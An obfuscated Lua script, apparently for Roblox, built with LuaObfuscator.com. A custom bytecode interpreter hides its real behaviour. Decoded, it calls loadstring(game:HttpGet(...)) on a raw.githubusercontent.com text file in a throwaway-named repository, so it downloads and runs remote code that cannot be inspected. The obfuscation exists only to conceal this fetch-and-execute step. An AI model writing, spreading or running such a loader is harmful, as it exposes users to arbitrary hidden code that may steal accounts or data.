--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=v2(v0(v30,16));if v19 then local v91=v5(v81,v19);v19=nil;return v91;else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/((570 -(367 + 201))^(v32-(928 -((1279 -(68 + 997)) + 713)))))%((5 -(1273 -(226 + 1044)))^(((v33-(2 -1)) -(v32-1)) + (1 -0))) ;return v82-(v82%(878 -(282 + 595))) ;else local v83=(4 -2)^(v32-((2699 -2079) -(555 + 64))) ;return (((v31%(v83 + v83))>=v83) and ((1049 -(32 + 85)) -(857 + 74))) or ((0 + 0) -0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -(892 + 65)) ;return (v36 * (610 -354)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + ((12 -7) -2) );v18=v18 + (7 -3) ;return (v40 * (16777566 -(87 + 263))) + (v39 * (65716 -(67 + 113))) + (v38 * (188 + 68)) + v37 ;end local function v24() local v41=0 + 0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(0 -0)) then v42=v23();v43=v23();v41=(1693 -740) -(802 + 150) ;end if (v41==(7 -4)) then if (v46==(0 -0)) then if (v45==(0 + (1080 -(1020 + 60)))) then return v47 * (997 -(915 + 82)) ;else v46=2 -1 ;v44=0 + 0 ;end elseif (v46==(2691 -644)) then return ((v45==(1187 -(422 + 647 + 118))) and (v47 * ((1 + (0 -0))/0))) or (v47 * NaN) ;end return v8(v47,v46-(2320 -1297) ) * (v44 + (v45/((774 -((1948 -(760 + 987)) + 571))^(1190 -(116 + 1022))))) ;end if (v41==(3 -1)) then v46=v20(v43,4 + (1930 -(1789 + 124)) ,54 -23 );v47=((v20(v43,116 -84 )==(1 + 0)) and  -1) or (792 -(368 + 423)) ;v41=9 -6 ;end if (v41==(19 -(10 + 8))) then v44=1;v45=(v20(v43,3 -(1425 -(630 + 793)) ,786 -(745 + 21) ) * (2^((164 + 310) -((1409 -993) + (123 -97))))) + v42 ;v41=6 -4 ;end end end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v64=1 + 0 , #v49 do v50[v64]=v2(v1(v3(v49,v64,v64)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();while true do if (v51== #":") then local v87=(function() return 0 + 0 ;end)();local v88=(function() return;end)();while true do if (0~=v87) then else v88=(function() return 0 + 0 ;end)();while true do if (v88==(123 -(17 + 104))) then v51=(function() return 2;end)();break;end if (v88==(1087 -(461 + 625))) then for v121= #"<",v56 do local v122=(function() return 0 -0 ;end)();local v123=(function() return;end)();local v124=(function() return;end)();local v125=(function() return;end)();while true do if (v122==(0 + 0)) then v123=(function() return 0 + 0 ;end)();v124=(function() return nil;end)();v122=(function() return 1 + 0 ;end)();end if ((1 -0)==v122) then v125=(function() return nil;end)();while true do if (v123==(1 -0)) then if (v124== #":") then v125=(function() return v21()~=(0 + 0) ;end)();elseif (v124==(1 + 1)) then v125=(function() return v24();end)();elseif (v124== #"19(") then v125=(function() return v25();end)();end v57[v121]=(function() return v125;end)();break;end if (v123~=(1636 -(1373 + 263))) then else local v168=(function() return 1000 -(451 + 549) ;end)();local v169=(function() return;end)();while true do if (v168~=(0 + 0)) then else v169=(function() return 0 -0 ;end)();while true do if (v169==(0 -0)) then v124=(function() return v21();end)();v125=(function() return nil;end)();v169=(function() return 1385 -(746 + 638) ;end)();end if (v169~=(1 + 0)) then else v123=(function() return 1 + 0 ;end)();break;end end break;end end end end break;end end end v55[ #"91("]=(function() return v21();end)();v88=(function() return 531 -(406 + 123) ;end)();end if (v88==(0 -0)) then v56=(function() return v23();end)();v57=(function() return {};end)();v88=(function() return 1 + 0 ;end)();end end break;end end end if (v51==(1324 -(1249 + 73))) then for v92= #"{",v23() do local v93=(function() return 0 + 0 ;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do if (v93==0) then v94=(function() return 0;end)();v95=(function() return nil;end)();v93=(function() return 342 -(218 + 123) ;end)();end if (v93~=(2 -1)) then else while true do if (v94==(1581 -(1535 + 46))) then v95=(function() return v21();end)();if (v20(v95, #"{", #",")~=(0 + 0)) then else local v155=(function() return 0 + 0 ;end)();local v156=(function() return;end)();local v157=(function() return;end)();local v158=(function() return;end)();while true do if ((563 -(306 + 254))==v155) then if (v20(v157, #"91(", #"19(")== #"/") then v158[ #"0313"]=(function() return v57[v158[ #"xnxx"]];end)();end v52[v92]=(function() return v158;end)();break;end if (v155~=1) then else local v165=(function() return 0 + 0 ;end)();local v166=(function() return;end)();while true do if (v165~=(0 -0)) then else v166=(function() return 0;end)();while true do if ((1 + 0)~=v166) then else v155=(function() return 1469 -(899 + 568) ;end)();break;end if (v166==(0 + 0)) then v158=(function() return {v22(),v22(),nil,nil};end)();if (v156==0) then local v173=(function() return 603 -(268 + 335) ;end)();local v174=(function() return;end)();while true do if (v173==(290 -(60 + 230))) then v174=(function() return 572 -(426 + 146) ;end)();while true do if (v174~=0) then else v158[ #"nil"]=(function() return v22();end)();v158[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v156== #"~") then v158[ #"19("]=(function() return v23();end)();elseif (v156==(116 -(4 + 110))) then v158[ #"asd"]=(function() return v23() -((586 -(57 + 527))^16) ;end)();elseif (v156~= #"asd") then else local v179=(function() return 1427 -(41 + 1386) ;end)();local v180=(function() return;end)();while true do if (v179==(103 -(17 + 86))) then v180=(function() return 0 + 0 ;end)();while true do if (v180==(1456 -(282 + 1174))) then v158[ #"19("]=(function() return v23() -((3 -1)^(827 -(569 + 242))) ;end)();v158[ #"http"]=(function() return v22();end)();break;end end break;end end end v166=(function() return 167 -(122 + 44) ;end)();end end break;end end end if ((5 -3)~=v155) then else if (v20(v157, #"}", #"|")== #":") then v158[1 + 1 ]=(function() return v57[v158[2]];end)();end if (v20(v157,2 -0 ,1026 -(706 + 318) )== #" ") then v158[ #"xnx"]=(function() return v57[v158[ #"91("]];end)();end v155=(function() return 1254 -(721 + 530) ;end)();end if ((1271 -(945 + 326))==v155) then v156=(function() return v20(v95,4 -2 , #"nil");end)();v157=(function() return v20(v95, #"0313",5 + 1 );end)();v155=(function() return 1 + 0 ;end)();end end end break;end end break;end end end for v96= #"\\",v23() do v53[v96-#"\\" ]=(function() return v28();end)();end return v55;end if (v51~=0) then else local v89=(function() return 0;end)();local v90=(function() return;end)();while true do if (v89==(0 + 0)) then v90=(function() return 700 -(271 + 429) ;end)();while true do if (v90==1) then v54=(function() return {};end)();v55=(function() return {v52,v53,nil,v54};end)();v90=(function() return 67 -(30 + 35) ;end)();end if (2~=v90) then else v51=(function() return  #".";end)();break;end if (v90==(1500 -(1408 + 92))) then v52=(function() return {};end)();v53=(function() return {};end)();v90=(function() return 1;end)();end end break;end end end end end local function v29(v58,v59,v60) local v61=v58[(1581 -(1183 + 397)) + (0 -0) ];local v62=v58[1259 -(1043 + 214) ];local v63=v58[11 -8 ];return function(...) local v66=v61;local v67=v62;local v68=v63;local v69=v27;local v70=1213 -(323 + 889) ;local v71= -(2 -1);local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v84=0 + 0 ,v74 do if (v84>=v68) then v72[v84-v68 ]=v73[v84 + (321 -(53 + 267)) ];else v76[v84]=v73[v84 + 1 + 0 ];end end local v77=(v74-v68) + ((310 + 104) -(15 + 398)) ;local v78;local v79;while true do v78=v66[v70];v79=v78[1];if (v79<=(985 -(18 + 964))) then if (v79<=(3 -2)) then if (v79>0) then do return;end else local v102=0 + 0 ;local v103;local v104;local v105;local v106;local v107;while true do if ((647<=3287) and (v102==(1 + 0))) then v70=v70 + (851 -(20 + 830)) ;v78=v66[v70];v76[v78[2 + 0 ]]=v60[v78[(2104 -(1913 + 62)) -(116 + 10) ]];v70=v70 + 1 ;v78=v66[v70];v102=1 + 1 ;end if ((v102==(740 -(542 + 196))) or (2318>=4800)) then v76[v78[2]]=v60[v78[3]];v70=v70 + (1 -0) ;v78=v66[v70];v107=v78[2];v106=v76[v78[1 + 2 ]];v102=2 + 1 ;end if ((3926<=4134) and (v102==(2 + 1))) then v76[v107 + (2 -1) ]=v106;v76[v107]=v106[v78[9 -(4 + 1) ]];v70=v70 + 1 ;v78=v66[v70];v76[v78[1553 -(1126 + 425) ]]=v78[408 -(118 + 287) ];v102=4;end if (v102==(19 -14)) then v103=1121 -(118 + 1003) ;for v159=v107,v71 do v103=v103 + (2 -(2 -1)) ;v76[v159]=v104[v103];end v70=v70 + (378 -(142 + 235)) ;v78=v66[v70];v107=v78[9 -7 ];v102=(1935 -(565 + 1368)) + 4 ;end if ((981 -(553 + 424))==v102) then v70=v70 + (1 -0) ;v78=v66[v70];v107=v78[2];v104,v105=v69(v76[v107](v13(v76,v107 + 1 + 0 ,v78[(11 -8) + 0 ])));v71=(v105 + v107) -(1 + 0) ;v102=3 + 2 ;end if ((0 + 0)==v102) then v103=nil;v104,v105=nil;v106=nil;v107=nil;v76[v78[2]]={};v102=2 -(1662 -(1477 + 184)) ;end if (v102==(19 -(15 -3))) then v78=v66[v70];do return;end break;end if (v102==((13 + 0) -7)) then v76[v107]=v76[v107](v13(v76,v107 + 1 + 0 ,v71));v70=v70 + (4 -3) ;v78=v66[v70];v76[v78[755 -((1095 -(564 + 292)) + 514) ]]();v70=v70 + (1 -0) + 0 ;v102=1336 -(797 + 532) ;end end end elseif ((v79>(2 + 0)) or (164>=2785)) then v76[v78[1 + 1 ]]();else v76[v78[(11 -7) -(306 -(244 + 60)) ]]=v78[1205 -(373 + 829) ];end elseif ((v79<=(736 -(476 + 255))) or (142>=4749)) then if ((v79==(1134 -(284 + 85 + (1237 -(41 + 435))))) or (525==2109)) then v76[v78[2 + 0 ]]=v60[v78[3]];else v76[v78[2 -0 ]]={};end elseif (v79<=6) then local v113=v78[3 -1 ];local v114,v115=v69(v76[v113](v13(v76,v113 + (239 -(64 + 174)) ,v78[1 + 2 ])));v71=(v115 + v113) -(1 -(1001 -(938 + 63))) ;local v116=0;for v118=v113,v71 do v116=v116 + 1 ;v76[v118]=v114[v116];end elseif (v79>((264 + 79) -((1269 -(936 + 189)) + 192))) then local v126=v78[2];local v127=v76[v78[219 -(42 + 174) ]];v76[v126 + 1 ]=v127;v76[v126]=v127[v78[4 + 0 ]];else local v131=0 + 0 ;local v132;while true do if (v131==0) then v132=v78[2];v76[v132]=v76[v132](v13(v76,v132 + 1 + 0 ,v71));break;end end end v70=v70 + ((496 + 1009) -((1976 -(1565 + 48)) + 705 + 436)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403593Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F646F6962756F6E6A712F6173646173646173642F726566732F68656164732F6D61696E2F6D652Q736167652D322532302832292E74787400099Q003Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);